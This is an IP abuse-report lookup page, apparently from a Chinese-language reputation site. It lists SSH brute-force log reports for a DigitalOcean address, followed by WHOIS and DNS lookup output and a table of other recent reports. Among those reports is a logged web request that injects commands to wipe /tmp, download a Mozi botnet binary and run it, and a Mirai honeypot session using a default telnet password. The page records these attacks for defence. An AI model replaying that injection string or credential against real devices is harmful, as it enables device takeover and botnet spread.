城市(city): Bengaluru
省份(region): Karnataka
国家(country): India
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 139.59.66.101 | attackbotsspam | Sep 14 17:54:38 nextcloud sshd\[7451\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 user=root Sep 14 17:54:41 nextcloud sshd\[7451\]: Failed password for root from 139.59.66.101 port 53686 ssh2 Sep 14 18:01:59 nextcloud sshd\[15774\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 user=root |
2020-09-15 02:54:33 |
| 139.59.66.101 | attackspam | Sep 14 08:39:07 h2779839 sshd[26572]: Invalid user admin from 139.59.66.101 port 48480 Sep 14 08:39:07 h2779839 sshd[26572]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Sep 14 08:39:07 h2779839 sshd[26572]: Invalid user admin from 139.59.66.101 port 48480 Sep 14 08:39:09 h2779839 sshd[26572]: Failed password for invalid user admin from 139.59.66.101 port 48480 ssh2 Sep 14 08:43:47 h2779839 sshd[26687]: Invalid user laurentiu from 139.59.66.101 port 33774 Sep 14 08:43:47 h2779839 sshd[26687]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Sep 14 08:43:47 h2779839 sshd[26687]: Invalid user laurentiu from 139.59.66.101 port 33774 Sep 14 08:43:49 h2779839 sshd[26687]: Failed password for invalid user laurentiu from 139.59.66.101 port 33774 ssh2 Sep 14 08:48:23 h2779839 sshd[26738]: Invalid user centos from 139.59.66.101 port 47408 ... |
2020-09-14 18:43:56 |
| 139.59.66.101 | attackbots | <6 unauthorized SSH connections |
2020-08-31 16:28:46 |
| 139.59.66.101 | attack | Aug 21 09:28:18 Invalid user testuser from 139.59.66.101 port 47420 |
2020-08-21 19:40:30 |
| 139.59.66.101 | attackspambots | 2020-08-16T14:23:23.208573+02:00 |
2020-08-16 23:21:31 |
| 139.59.66.101 | attackbots | Jul 31 06:14:36 buvik sshd[16204]: Failed password for root from 139.59.66.101 port 54776 ssh2 Jul 31 06:18:59 buvik sshd[16867]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 user=root Jul 31 06:19:02 buvik sshd[16867]: Failed password for root from 139.59.66.101 port 37632 ssh2 ... |
2020-07-31 12:29:05 |
| 139.59.66.101 | attack | Invalid user fe from 139.59.66.101 port 49268 |
2020-07-28 06:09:58 |
| 139.59.66.101 | attackspam | Jul 25 11:45:39 haigwepa sshd[27169]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Jul 25 11:45:41 haigwepa sshd[27169]: Failed password for invalid user chun from 139.59.66.101 port 52988 ssh2 ... |
2020-07-25 18:02:15 |
| 139.59.66.101 | attackspam | 2020-07-15T21:10:54.391611sd-86998 sshd[2574]: Invalid user ts3server from 139.59.66.101 port 35094 2020-07-15T21:10:54.394974sd-86998 sshd[2574]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 2020-07-15T21:10:54.391611sd-86998 sshd[2574]: Invalid user ts3server from 139.59.66.101 port 35094 2020-07-15T21:10:56.462045sd-86998 sshd[2574]: Failed password for invalid user ts3server from 139.59.66.101 port 35094 ssh2 2020-07-15T21:15:11.311933sd-86998 sshd[3159]: Invalid user wanghui from 139.59.66.101 port 45352 ... |
2020-07-16 03:50:20 |
| 139.59.66.101 | attackspam | Jul 12 15:31:52 scw-6657dc sshd[29892]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Jul 12 15:31:52 scw-6657dc sshd[29892]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Jul 12 15:31:54 scw-6657dc sshd[29892]: Failed password for invalid user sharon from 139.59.66.101 port 60226 ssh2 ... |
2020-07-13 02:00:00 |
| 139.59.66.101 | attackbotsspam | Jul 11 10:24:23 buvik sshd[31300]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.66.101 Jul 11 10:24:25 buvik sshd[31300]: Failed password for invalid user rentbikegate from 139.59.66.101 port 54836 ssh2 Jul 11 10:27:34 buvik sshd[31715]: Invalid user plesk from 139.59.66.101 ... |
2020-07-11 16:34:10 |
| 139.59.66.101 | attackbots | Cowrie Honeypot: 10 unauthorised SSH/Telnet login attempts between 2020-07-10T06:14:24Z and 2020-07-10T06:45:42Z |
2020-07-10 16:42:25 |
| 139.59.66.245 | attackbots | unauthorized connection attempt |
2020-06-26 13:34:17 |
| 139.59.66.185 | attackspambots | Survey redirect via email to MMS. Unsolicited spam. |
2020-06-26 04:52:47 |
| 139.59.66.245 | attack | Fail2Ban Ban Triggered |
2020-06-23 12:24:25 |
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
NetRange: 139.59.0.0 - 139.59.255.255
CIDR: 139.59.0.0/16
NetName: APNIC-ERX-139-59-0-0
NetHandle: NET-139-59-0-0-1
Parent: NET139 (NET-139-0-0-0-0)
NetType: Early Registrations, Transferred to APNIC
OriginAS:
Organization: Asia Pacific Network Information Centre (APNIC)
RegDate: 2004-03-03
Updated: 2009-10-08
Comment: This IP address range is not registered in the ARIN database.
Comment: This range was transferred to the APNIC Whois Database as
Comment: part of the ERX (Early Registration Transfer) project.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref: https://rdap.arin.net/registry/ip/139.59.0.0
ResourceLink: https://apps.db.ripe.net/db-web-ui/query
ResourceLink: whois.apnic.net
OrgName: Asia Pacific Network Information Centre
OrgId: APNIC
Address: PO Box 3646
City: South Brisbane
StateProv: QLD
PostalCode: 4101
Country: AU
RegDate:
Updated: 2012-01-24
Ref: https://rdap.arin.net/registry/entity/APNIC
ReferralServer: whois://whois.apnic.net
ResourceLink: http://wq.apnic.net/whois-search/static/search.html
OrgAbuseHandle: AWC12-ARIN
OrgAbuseName: APNIC Whois Contact
OrgAbusePhone: +61 7 3858 3188
OrgAbuseEmail: search-apnic-not-arin@apnic.net
OrgAbuseRef: https://rdap.arin.net/registry/entity/AWC12-ARIN
OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net
OrgTechRef: https://rdap.arin.net/registry/entity/AWC12-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
Found a referral to whois.apnic.net.
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '139.59.64.0 - 139.59.79.255'
% Abuse contact for '139.59.64.0 - 139.59.79.255' is 'abuse@digitalocean.com'
inetnum: 139.59.64.0 - 139.59.79.255
netname: DIGITALOCEAN-AP
descr: DigitalOcean, LLC
country: IN
admin-c: DOIA2-AP
tech-c: DOIA2-AP
abuse-c: AD699-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-DIGITALOCEAN-AP
mnt-irt: IRT-DIGITALOCEAN-AP
last-modified: 2020-05-31T21:36:27Z
source: APNIC
irt: IRT-DIGITALOCEAN-AP
address: 105 Edgeview Drive, Suite 425, Broomfield, Colorado 80021
e-mail: noc@digitalocean.com
abuse-mailbox: abuse@digitalocean.com
admin-c: DOIA2-AP
tech-c: DOIA2-AP
auth: # Filtered
remarks: noc@digitalocean.com is invalid
remarks: abuse@digitalocean.com is invalid
mnt-by: MAINT-DIGITALOCEAN-AP
last-modified: 2026-03-04T13:09:28Z
source: APNIC
role: ABUSE DIGITALOCEANAP
country: ZZ
address: 105 Edgeview Drive, Suite 425, Broomfield, Colorado 80021
phone: +000000000
e-mail: noc@digitalocean.com
admin-c: DOIA2-AP
tech-c: DOIA2-AP
nic-hdl: AD699-AP
remarks: Generated from irt object IRT-DIGITALOCEAN-AP
remarks: noc@digitalocean.com is invalid
remarks: abuse@digitalocean.com is invalid
abuse-mailbox: abuse@digitalocean.com
mnt-by: APNIC-ABUSE
last-modified: 2026-03-04T13:11:16Z
source: APNIC
role: Digital Ocean Inc administrator
address: 105 Edgeview Drive, Suite 425, Broomfield, Colorado 80021
country: US
phone: +1 646-827-4366
fax-no: +1 646-827-4366
e-mail: abuse@digitalocean.com
admin-c: DOIA2-AP
tech-c: DOIA2-AP
nic-hdl: DOIA2-AP
mnt-by: MAINT-DIGITALOCEAN-AP
last-modified: 2025-04-11T18:24:27Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.36-SNAPSHOT (WHOIS-AU5); <<>> DiG 9.10.3-P4-Ubuntu <<>> 139.59.66.30
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 48082
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;139.59.66.30. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026031000 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Mar 11 00:30:09 CST 2026
;; MSG SIZE rcvd: 105Host 30.66.59.139.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 30.66.59.139.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 213.162.215.223 | attackspambots | ** MIRAI HOST ** Sun Feb 23 21:45:11 2020 - Child process 222951 handling connection Sun Feb 23 21:45:11 2020 - New connection from: 213.162.215.223:36466 Sun Feb 23 21:45:11 2020 - Sending data to client: [Login: ] Sun Feb 23 21:45:11 2020 - Got data: root Sun Feb 23 21:45:12 2020 - Sending data to client: [Password: ] Sun Feb 23 21:45:13 2020 - Got data: vizxv Sun Feb 23 21:45:15 2020 - Child 222952 granting shell Sun Feb 23 21:45:15 2020 - Child 222951 exiting Sun Feb 23 21:45:15 2020 - Sending data to client: [Logged in] Sun Feb 23 21:45:15 2020 - Sending data to client: [Welcome to MX990 Embedded Linux] Sun Feb 23 21:45:15 2020 - Sending data to client: [[root@dvrdvs /]# ] Sun Feb 23 21:45:15 2020 - Got data: enable system shell sh Sun Feb 23 21:45:15 2020 - Sending data to client: [Command not found] Sun Feb 23 21:45:15 2020 - Sending data to client: [[root@dvrdvs /]# ] Sun Feb 23 21:45:15 2020 - Got data: cat /proc/mounts; /bin/busybox CRKZX Sun Feb 23 21:45:15 2020 - Sending data to clie |
2020-02-24 19:57:22 |
| 113.137.21.112 | attackbotsspam | C1,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
2020-02-24 19:46:25 |
| 27.72.56.236 | attackbots | Port probing on unauthorized port 445 |
2020-02-24 20:01:54 |
| 45.143.220.10 | attackspambots | 45.143.220.10 was recorded 6 times by 4 hosts attempting to connect to the following ports: 5560,5660. Incident counter (4h, 24h, all-time): 6, 25, 25 |
2020-02-24 20:12:15 |
| 222.186.30.76 | attack | pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.30.76 user=root Failed password for root from 222.186.30.76 port 25464 ssh2 Failed password for root from 222.186.30.76 port 25464 ssh2 Failed password for root from 222.186.30.76 port 25464 ssh2 pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.30.76 user=root |
2020-02-24 20:17:43 |
| 93.42.109.154 | attack | unauthorized connection attempt |
2020-02-24 20:20:28 |
| 123.30.25.50 | attack | Unauthorized connection attempt from IP address 123.30.25.50 on Port 445(SMB) |
2020-02-24 19:51:38 |
| 220.107.15.251 | attackbotsspam | Feb 24 05:40:36 liveconfig01 sshd[23949]: Invalid user pi from 220.107.15.251 Feb 24 05:40:36 liveconfig01 sshd[23950]: Invalid user pi from 220.107.15.251 Feb 24 05:40:36 liveconfig01 sshd[23949]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.107.15.251 Feb 24 05:40:36 liveconfig01 sshd[23950]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.107.15.251 Feb 24 05:40:38 liveconfig01 sshd[23949]: Failed password for invalid user pi from 220.107.15.251 port 54142 ssh2 Feb 24 05:40:38 liveconfig01 sshd[23950]: Failed password for invalid user pi from 220.107.15.251 port 54146 ssh2 Feb 24 05:40:38 liveconfig01 sshd[23949]: Connection closed by 220.107.15.251 port 54142 [preauth] Feb 24 05:40:38 liveconfig01 sshd[23950]: Connection closed by 220.107.15.251 port 54146 [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=220.107.15.251 |
2020-02-24 20:24:00 |
| 92.63.194.148 | attackspambots | 02/24/2020-06:08:01.797960 92.63.194.148 Protocol: 6 ET SCAN NMAP -sS window 1024 |
2020-02-24 19:50:17 |
| 125.165.62.239 | attackspam | Unauthorized connection attempt from IP address 125.165.62.239 on Port 445(SMB) |
2020-02-24 19:52:41 |
| 34.93.238.77 | attack | suspicious action Mon, 24 Feb 2020 01:45:00 -0300 |
2020-02-24 20:01:03 |
| 80.82.77.189 | attackspam | Feb 24 13:13:06 debian-2gb-nbg1-2 kernel: \[4805587.467490\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=80.82.77.189 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=61276 PROTO=TCP SPT=58355 DPT=58787 WINDOW=1024 RES=0x00 SYN URGP=0 |
2020-02-24 20:14:25 |
| 85.132.37.213 | attackbotsspam | Port probing on unauthorized port 445 |
2020-02-24 20:08:37 |
| 187.162.254.163 | attack | Automatic report - Port Scan Attack |
2020-02-24 20:11:51 |
| 62.211.6.99 | attackbotsspam | Email rejected due to spam filtering |
2020-02-24 20:26:50 |